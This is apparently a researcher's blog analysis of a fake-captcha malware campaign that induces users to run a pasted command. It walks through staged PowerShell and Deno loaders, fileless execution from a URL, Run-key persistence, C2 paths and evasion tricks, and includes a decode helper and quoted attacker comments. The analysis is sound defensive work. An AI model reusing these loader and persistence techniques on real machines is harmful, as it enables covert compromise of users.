Infection
A testament to why it’s important to give your family basic cybersecurity awareness skills, one of my family members sent this to me, saying: “this seems weird, should I do it?”. Emphatically, no.
Naturally, I took this into my lab and ran down the chain to see what it tried to do.
Evasion
The website script seems to have several features to avoid detection, and when these were triggered the popup would not show. It also appears that it has some form of devtools detection, to avoid analysis.
The server serving the malicious JS also seemed to have some basic OS/browser, and potentially IP detection, to avoid analysis. In many cases, it would return a placeholder script that does nothing.
It seems like this script is dynamically built (as are later stages), with specific build IDs and timeouts. My hypothesis is that this is used for evading reporting & detection, as live URLs for the initial stages are live long enough to compromise someone’s PC, but short enough to be dead by the time they are analyzed.
Kill Chain
-
- A malicious script embedded in a webpage they were visiting.
- Politely ask the user to self-compromise their machine via the
CMD+X
-
- This loads several other scripts, including a crypto-miner, and this fake captcha script.
-
- If you do this, it runs some shellcode. This reaches out and downloads a new powershell script.
-
- This new script downloads Deno, accepts licenses, and then invokes it with a URL to a stage 1 js payload from the C&C server
-
- Stage 2 is loaded from the C&C server, which contains a remote access toolkit.
Interesting Properties
The malware runs completely in memory - no files on disk. Thanks do deno’s ability to run via URL (e.g. deno https://rich.sh/xss.js), it loads and executes
whatever you give it without touching the disk. Thus, many scanning-based AV tools would never spot this executing.
I see one other reference to this
Obfuscation Techniques
There are several highly obfuscated JavaScript programs in play.
First, what appears to be some sort of cryptominer, which might be secondary to the malware campaign? Anyways, this is a relatively simple
base-64 encoded string, which is decoded, then XOR’ed with a fixed key. Then, it’s decoded using decodeURIComponent, and executed via an IIFE.
I wrote the following method to decrypt the payload contents:
function decode(data, key) {
data = atob(data);
const out = new Uint8Array(data.length);
for (let i = 0; i < data.length; i++) {
out[i] = data.charCodeAt(i) ^ key;
}
return new TextDecoder().decode(out);
}Even More Obfuscation
The rest, is not easily decodable using static analysis. As it turns out, GPT is quite good at doing basic deobfuscation, so detonating this in a sandbox isn’t really needed for the purposes here.
The final payload, seems to be a loop where the malware:
- Acquire single-instance lock
- Collect victim fingerprint
- fingerprint =
hash(username + hostname + total_memory + architecture)
- fingerprint =
- Probe C2 infrastructure
- Authenticate to API backend
- This appears to use JWT for auth
- Request payload identifier
- Download staged payload
- Payloads appear to be staged
- Write persistence key
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- Execute payload
- Monitor / retry forever
C2 Architecture
C2
├── /health - c2 health check
├── /v02<build-id>.js - js stage 1
├── /v2<build-id>.js - js stage 2
└── /cdn/<payload-id>.js - payloadsIt appears our hackers have left some comments in the stage 2 powershell:
# launcher-1 is compiled on demand by the server at /v02<BUILD_ID>.js.
# It's a tiny eval-loop that fetches launcher-2 (which sets up autorun
# and runs main). Deno fetches it directly — no disk file written by
# our code, only Deno's URL cache populates.Lessons Learned
- Teach your family basic cybersecurity awareness
- Block things like CMD+X on computers where users have no business using it
More Information
I have compiled and archived all the associated malware I captured, so if you are are researching this malware family, reach out via email or on X, and assuming you are a reputable professional, I will provide the archive.